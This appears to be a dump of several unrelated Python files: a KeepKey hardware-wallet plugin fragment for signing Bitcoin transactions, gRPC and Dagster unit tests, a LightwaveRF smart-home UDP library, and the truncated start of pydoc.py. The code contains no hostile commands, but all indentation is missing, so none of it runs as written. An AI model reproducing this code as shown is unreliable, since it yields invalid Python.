item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx: Transaction):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if info.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.timestamp = d['time']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
_channel_test.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import threading
import unittest
from grpc._cython import cygrpc
from tests.unit.framework.common import test_constants
def _channel_and_completion_queue():
channel = cygrpc.Channel(b'localhost:54321', cygrpc.ChannelArgs(()))
completion_queue = cygrpc.CompletionQueue()
return channel, completion_queue
def _connectivity_loop(channel, completion_queue):
for _ in range(100):
connectivity = channel.check_connectivity_state(True)
channel.watch_connectivity_state(connectivity,
cygrpc.Timespec(time.time() + 0.2),
completion_queue, None)
completion_queue.poll(deadline=cygrpc.Timespec(float('+inf')))
def _create_loop_destroy():
channel, completion_queue = _channel_and_completion_queue()
_connectivity_loop(channel, completion_queue)
completion_queue.shutdown()
def _in_parallel(behavior, arguments):
threads = tuple(
threading.Thread(target=behavior, args=arguments)
for _ in range(test_constants.THREAD_CONCURRENCY))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
class ChannelTest(unittest.TestCase):
def test_single_channel_lonely_connectivity(self):
channel, completion_queue = _channel_and_completion_queue()
_in_parallel(_connectivity_loop, (
channel,
completion_queue,
))
completion_queue.shutdown()
def test_multiple_channels_lonely_connectivity(self):
_in_parallel(_create_loop_destroy, ())
if __name__ == '__main__':
unittest.main(verbosity=2)
|
test_stdout.py
|
from __future__ import print_function
import os
import random
import string
import sys
import time
import pytest
from dagster import (
DagsterEventType,
ExecutionTargetHandle,
InputDefinition,
ModeDefinition,
execute_pipeline,
pipeline,
resource,
solid,
)
from dagster.core.execution.compute_logs import should_disable_io_stream_redirect
from dagster.core.instance import DagsterInstance
from dagster.core.storage.compute_log_manager import ComputeIOType
from dagster.utils import get_multiprocessing_context
HELLO_SOLID = 'HELLO SOLID'
HELLO_RESOURCE = 'HELLO RESOURCE'
SEPARATOR = os.linesep if (os.name == 'nt' and sys.version_info < (3,)) else '\n'
@resource
def resource_a(_):
print(HELLO_RESOURCE)
return 'A'
@solid
def spawn(_):
return 1
@solid(input_defs=[InputDefinition('num', int)], required_resource_keys={'a'})
def spew(_, num):
print(HELLO_SOLID)
return num
def define_pipeline():
@pipeline(mode_defs=[ModeDefinition(resource_defs={'a': resource_a})])
def spew_pipeline():
spew(spew(spawn()))
return spew_pipeline
def normalize_file_content(s):
return '\n'.join([line for line in s.replace(os.linesep, '\n').split('\n') if line])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk():
spew_pipeline = define_pipeline()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith('spawn'):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, 'r') as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk_multiprocess():
spew_pipeline = ExecutionTargetHandle.for_pipeline_python_file(
__file__, 'define_pipeline'
).build_pipeline_definition()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(
spew_pipeline,
environment_dict={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},
instance=instance,
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith('spawn'):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, 'r') as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager():
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
spew_pipeline = define_pipeline()
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 3
step_key = 'spew.compute'
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
stderr = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDERR)
cleaned_logs = stderr.data.replace('\x1b[34m', '').replace('\x1b[0m', '')
assert 'dagster - DEBUG - spew_pipeline - ' in cleaned_logs
bad_logs = manager.read_logs_file('not_a_run_id', step_key, ComputeIOType.STDOUT)
assert bad_logs.data is None
assert not manager.is_watch_completed('not_a_run_id', step_key)
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager_subscriptions():
instance = DagsterInstance.local_temp()
spew_pipeline = define_pipeline()
step_key = 'spew.compute'
result = execute_pipeline(spew_pipeline, instance=instance)
stdout_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDOUT
)
stderr_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDERR
)
stdout = []
stdout_observable.subscribe(stdout.append)
stderr = []
stderr_observable.subscribe(stderr.append)
assert len(stdout) == 1
assert stdout[0].data.startswith(HELLO_SOLID)
assert stdout[0].cursor in [12, 13]
assert len(stderr) == 1
assert stderr[0].cursor == len(stderr[0].data)
assert stderr[0].cursor > 400
def gen_solid_name(length):
return ''.join(random.choice(string.ascii_lowercase) for x in range(length))
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_long_solid_names():
solid_name = gen_solid_name(300)
@pipeline(mode_defs=[ModeDefinition(resource_defs={'a': resource_a})])
def long_pipeline():
spew.alias(name=solid_name)()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(
long_pipeline,
instance=instance,
environment_dict={'solids': {solid_name: {'inputs': {'num': 1}}}},
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 1
step_key = compute_steps[0]
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
def execute_inner(step_key, pipeline_run, instance_ref):
instance = DagsterInstance.from_ref(instance_ref)
inner_step(instance, pipeline_run, step_key)
def inner_step(instance, pipeline_run, step_key):
with instance.compute_log_manager.watch(pipeline_run, step_key=step_key):
time.sleep(0.1)
print(step_key, 'inner 1')
print(step_key, 'inner 2')
print(step_key, 'inner 3')
time.sleep(0.1)
def expected_inner_output(step_key):
return '\n'.join(
["{step_key} inner {num}".format(step_key=step_key, num=i + 1) for i in range(3)]
)
def expected_outer_prefix():
return '\n'.join(["outer {num}".format(num=i + 1) for i in range(3)])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_single():
instance = DagsterInstance.local_temp()
pipeline_name = 'foo_pipeline'
pipeline_run = instance.get_or_create_run(pipeline_name=pipeline_name, pipeline_snapshot=None)
step_keys = ['A', 'B', 'C']
with instance.compute_log_manager.watch(pipeline_run):
print('outer 1')
print('outer 2')
print('outer 3')
for step_key in step_keys:
inner_step(instance, pipeline_run, step_key)
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_multi():
instance = DagsterInstance.local_temp()
pipeline_name = 'foo_pipeline'
pipeline_run = instance.get_or_create_run(pipeline_name=pipeline_name, pipeline_snapshot=None)
context = get_multiprocessing_context()
step_keys = ['A', 'B', 'C']
with instance.compute_log_manager.watch(pipeline_run):
print('outer 1')
print('outer 2')
print('outer 3')
for step_key in step_keys:
process = context.Process(
target=execute_inner, args=(step_key, pipeline_run, instance.get_ref())
)
process.start()
process.join()
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
# The way that the multiprocess compute-logging interacts with pytest (which stubs out the
# sys.stdout fileno) makes this difficult to test. The pytest-captured stdout only captures
# the stdout from the outer process, not also the inner process
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
|
lightwave.py
|
"""Python library to provide reliable communication link with LightWaveRF lights and switches."""
import json
import logging
import socket
import time
from itertools import cycle
from queue import Queue
from threading import Thread
_LOGGER = logging.getLogger(__name__)
class LWLink():
"""LWLink provides a communication link with the LightwaveRF hub."""
SOCKET_TIMEOUT = 2.0
RX_PORT = 9761
TX_PORT = 9760
link_ip = None
proxy_ip = None
proxy_port = None
transaction_id = cycle(range(1, 1000))
the_queue = Queue()
thread = None
def __init__(self, link_ip=None):
"""Initialise the component."""
if link_ip is not None:
LWLink.link_ip = link_ip
def _send_message(self, msg):
"""Add message to queue and start processing the queue."""
LWLink.the_queue.put_nowait(msg)
if LWLink.thread is None or not LWLink.thread.isAlive():
LWLink.thread = Thread(target=self._send_queue)
LWLink.thread.start()
def register(self):
"""Create the message to register client."""
msg = '!F*p'
self._send_message(msg)
def deregister_all(self):
"""Create the message to deregister all clients."""
msg = '!F*xP'
self._send_message(msg)
def turn_on_light(self, device_id, name):
"""Create the message to turn light on."""
msg = "!%sFdP32|Turn On|%s" % (device_id, name)
self._send_message(msg)
def turn_on_switch(self, device_id, name):
"""Create the message to turn switch on."""
msg = "!%sF1|Turn On|%s" % (device_id, name)
self._send_message(msg)
def turn_on_with_brightness(self, device_id, name, brightness):
"""Scale brightness from 0..255 to 1..32."""
brightness_value = round((brightness * 31) / 255) + 1
# F1 = Light on and F0 = light off. FdP[0..32] is brightness. 32 is
# full. We want that when turning the light on.
msg = "!%sFdP%d|Lights %d|%s" % (
device_id, brightness_value, brightness_value, name)
self._send_message(msg)
def turn_off(self, device_id, name):
"""Create the message to turn light or switch off."""
msg = "!%sF0|Turn Off|%s" % (device_id, name)
self._send_message(msg)
def set_temperature(self, device_id, temp, name):
"""Create the message to set the trv target temp."""
msg = '!%sF*tP%s|Set Target|%s' % (device_id, round(temp, 1), name)
self._send_message(msg)
def set_trv_proxy(self, proxy_ip, proxy_port):
"""Set Lightwave TRV proxy ip/port."""
self.proxy_ip = proxy_ip
self.proxy_port = proxy_port
def read_trv_status(self, serial):
"""Read Lightwave TRV status from the proxy."""
targ = temp = battery = trv_output = None
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
sock.settimeout(2.0)
msg = serial.encode("UTF-8")
sock.sendto(msg, (self.proxy_ip, self.proxy_port))
response, dummy = sock.recvfrom(1024)
msg = response.decode()
j = json.loads(msg)
if "cTemp" in j.keys():
temp = j["cTemp"]
if "cTarg" in j.keys():
targ = j["cTarg"]
if "batt" in j.keys():
# convert the voltage to a rough percentage
battery = int((j["batt"] - 2.22) * 110)
if "output" in j.keys():
trv_output = j["output"]
if "error" in j.keys():
_LOGGER.warning("TRV proxy error: %s", j["error"])
except socket.timeout:
_LOGGER.warning("TRV proxy not responing")
except socket.error as ex:
_LOGGER.warning("TRV proxy error %s", ex)
except json.JSONDecodeError:
_LOGGER.warning("TRV proxy JSON error")
return (temp, targ, battery, trv_output)
def _send_queue(self):
"""If the queue is not empty, process the queue."""
while not LWLink.the_queue.empty():
self._send_reliable_message(LWLink.the_queue.get_nowait())
def _send_reliable_message(self, msg):
"""Send msg to LightwaveRF hub."""
result = False
max_retries = 15
trans_id = next(LWLink.transaction_id)
msg = "%d,%s" % (trans_id, msg)
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \
as write_sock, \
socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \
as read_sock:
write_sock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
read_sock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
read_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_BROADCAST, 1)
read_sock.settimeout(self.SOCKET_TIMEOUT)
read_sock.bind(('0.0.0.0', self.RX_PORT))
while max_retries:
max_retries -= 1
write_sock.sendto(msg.encode(
'UTF-8'), (LWLink.link_ip, self.TX_PORT))
result = False
while True:
response, dummy = read_sock.recvfrom(1024)
response = response.decode('UTF-8')
if "Not yet registered." in response:
_LOGGER.error("Not yet registered")
self.register()
result = True
break
if response.startswith("%d,OK" % trans_id):
result = True
break
if response.startswith("%d,ERR" % trans_id):
_LOGGER.error(response)
break
_LOGGER.info(response)
if result:
break
time.sleep(0.25)
except socket.timeout:
_LOGGER.error("LW broker timeout!")
return result
except Exception as ex:
_LOGGER.error(ex)
raise
if result:
_LOGGER.info("LW broker OK!")
else:
_LOGGER.error("LW broker fail!")
return result
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo', '$py.class'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
